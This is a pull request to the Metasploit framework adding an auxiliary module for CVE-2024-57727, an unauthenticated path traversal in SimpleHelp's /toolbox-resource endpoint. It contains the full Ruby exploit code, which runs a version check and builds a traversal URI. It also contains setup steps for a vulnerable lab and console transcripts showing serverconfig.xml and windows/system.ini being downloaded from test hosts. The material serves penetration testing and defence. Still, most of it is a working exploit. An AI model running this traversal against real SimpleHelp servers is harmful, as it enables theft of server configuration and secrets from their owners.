### PR TITLE
SimpleHelp Path Traversal CVE-2024-57727

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/simplehelp_toolbox_path_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/simplehelp_toolbox_path_traversal.md
@@ -4,7 +4,7 @@ remote attackers to download arbitrary files from the SimpleHelp server via craf
 
 ### Setup
 
-On Ubuntu 22.04 download the vulnerable version of SimpleHelp 5.5.7: 
+On Ubuntu 22.04 download a vulnerable version of SimpleHelp, for this demo we will use 5.5.7:
 `wget https://simple-help.com/releases/5.5.7/SimpleHelp-linux-amd64.tar.gz`
 
 Unzip the application:
@@ -13,11 +13,15 @@ cd /opt
 tar -xvf SimpleHelp-linux-amd64.tar.gz
 ```
 
-And start the server:
+Start the server:
 ```
 cd SimpleHelp
 sudo sh serverstart.sh
 ```
+
+Navigate to the Web App GUI at: `http://127.0.0.1` (by default the application should be listening on all interfaces).
+You should see "Welcome to your new SimpleHelp Server".
+Select "Start New Server". The application should now be vulnerable to the path traversal.
 
 ## Verification Steps
 

--- a/documentation/modules/auxiliary/scanner/http/simplehelp_toolbox_path_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/simplehelp_toolbox_path_traversal.md
@@ -1,0 +1,89 @@
+## Vulnerable Application
+There exists a path traversal vulnerability in the /toolbox-resource endpoint of SimpleHelp that enables unauthenticated
+remote attackers to download arbitrary files from the SimpleHelp server via crafted HTTP requests
+
+### Setup
+
+On Ubuntu 22.04 download the vulnerable version of SimpleHelp 5.5.7: 
+`wget https://simple-help.com/releases/5.5.7/SimpleHelp-linux-amd64.tar.gz`
+
+Unzip the application:
+```
+cd /opt
+tar -xvf SimpleHelp-linux-amd64.tar.gz
+```
+
+And start the server:
+```
+cd SimpleHelp
+sudo sh serverstart.sh
+```
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use simplehelp_toolbox_path_traversal`
+1. Set the `RHOST`
+1. Run the module
+1. Receive the file `serverconfig.xml` from the SimpleHelp
+
+## Scenarios
+### SimpleHelp 5.5.7 running on Ubuntu 22.04
+```
+msf6 exploit(windows/local/cve_2024_35250_ks_driver) > use simplehelp_toolbox_path_traversal
+
+Matching Modules
+================
+
+   #  Name                                                      Disclosure Date  Rank    Check  Description
+   -  ----                                                      ---------------  ----    -----  -----------
+   0  auxiliary/scanner/http/simplehelp_toolbox_path_traversal  2025-01-12       normal  No     Simple Help Path Traversal Vulnerability
+
+
+Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/simplehelp_toolbox_path_traversal
+
+[*] Using auxiliary/scanner/http/simplehelp_toolbox_path_traversal
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set rhost 172.16.199.130
+rhost => 172.16.199.130
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > run
+[*] Reloading module...
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 5.5.7
+[+] Downloaded 5233 bytes
+[+] File saved in: /Users/jheysel/.msf4/loot/20250220163655_default_172.16.199.130_simplehelp.trave_035651.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### SimpleHelp 5.5.7 running on Windows 11
+```
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set rhosts 172.16.199.131
+rhosts => 172.16.199.131
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set filepath windows/system.ini
+filepath => windows/system.ini
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set depth 4
+depth => 4
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > run
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 5.5.7
+[+] Downloaded 219 bytes
+[+] File saved in: /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > cat /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+[*] exec: cat /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+
+; for 16-bit app support
+[386Enh]
+woafont=dosapp.fon
+EGA80WOA.FON=EGA80WOA.FON
+EGA40WOA.FON=EGA40WOA.FON
+CGA80WOA.FON=CGA80WOA.FON
+CGA40WOA.FON=CGA40WOA.FON
+
+[drivers]
+wave=mmdrv.dll
+timer=timer.drv
+
+[mci]
+```

--- a/modules/auxiliary/scanner/http/simplehelp_toolbox_path_traversal.rb
+++ b/modules/auxiliary/scanner/http/simplehelp_toolbox_path_traversal.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary
         'DisclosureDate' => '2025-01-12',
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
-          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+          'SideEffects' => [ IOC_IN_LOGS, ],
           'Reliability' => [ ]
         }
       )

--- a/modules/auxiliary/scanner/http/simplehelp_toolbox_path_traversal.rb
+++ b/modules/auxiliary/scanner/http/simplehelp_toolbox_path_traversal.rb
@@ -1,0 +1,109 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SimpleHelp Path Traversal Vulnerability CVE-2024-57727',
+        'Description' => %q{
+          There exists a path traversal vulnerability in the /toolbox-resource endpoint that enables unauthenticated
+          remote attackers to download arbitrary files from the SimpleHelp server via crafted HTTP requests
+        },
+        'Author' => [
+          'horizon3ai', # discovery
+          'imjdl',      # CVE-2024-57727 PoC
+          'jheysel-r7'  # module
+        ],
+        'References' => [
+          [ 'URL', 'https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/'], # Discovery
+          [ 'URL', 'https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier'], # Vendor Advisory
+          [ 'URL', 'https://rustlang.rs/posts/simple-help/'], # PoC for Path Traversal CVE-2024-57727
+          [ 'URL', 'https://attackerkb.com/topics/G4CTOrbDx0/cve-2024-57727'], # PoC for Path Traversal CVE-2024-57727
+          [ 'CVE', '2024-57727'],
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2025-01-12',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+          'Reliability' => [ ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to SimpleHelp installation', '/']),
+        OptString.new('FILEPATH', [true, 'The path to the file to read', 'configuration/serverconfig.xml']),
+        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 2 ])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'allversions')
+    )
+
+    return Exploit::CheckCode::Unknown('Unable to retrieve SimpleHelp version.') unless res&.body =~ /Visual Version:\s*(\d+\.\d+(?:\.\d+))/
+
+    version = Rex::Version.new(Regexp.last_match(1))
+
+    # Patched versions are: 5.5.8 or 5.4.10 or 5.3.9
+    if version.between?(Rex::Version.new('5.5.0'), Rex::Version.new('5.5.7')) ||
+       version.between?(Rex::Version.new('5.4.0'), Rex::Version.new('5.4.9')) ||
+       version.between?(Rex::Version.new('5.3.0'), Rex::Version.new('5.3.8'))
+      return Exploit::CheckCode::Appears("Version detected: #{version}")
+    end
+
+    Exploit::CheckCode::Safe("Version detected: #{version}")
+  end
+
+  def run_host(ip)
+    directory = %w[alertsdb invitations secmsg toolbox-resources backups sslconfig translations notifications techprefs history recordings templates html remotework toolbox].sample
+    traverse = '../' * datastore['DEPTH']
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/toolbox-resource/../#{directory}/#{traverse}/#{datastore['FILEPATH']}")
+    )
+
+    unless res&.code == 200 && res.body.present?
+      print_error('Nothing was downloaded')
+      return
+    end
+
+    vprint_line(res.body)
+    print_good("Downloaded #{res.body.length} bytes")
+
+    report_vuln(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: name,
+      info: 'Module triggered a 200 reply',
+      refs: references
+    )
+
+    path = store_loot(
+      'simplehelp.traversal',
+      'text/plain',
+      ip,
+      res.body,
+      datastore['FILEPATH']
+    )
+    print_good("File saved in: #{path}")
+  end
+end


### PR DESCRIPTION
This adds a module to exploit a  path traversal vulnerability in the /toolbox-resource endpoint that enables unauthenticated remote attackers to download arbitrary files from the SimpleHelp server via crafted HTTP requests.

## Verification

List the steps needed to make sure this thing works

1. Start msfconsole
1. Do: `use simplehelp_toolbox_path_traversal`
1. Set the `RHOST`
1. Run the module
1. Receive the file `serverconfig.xml` from the SimpleHelp server
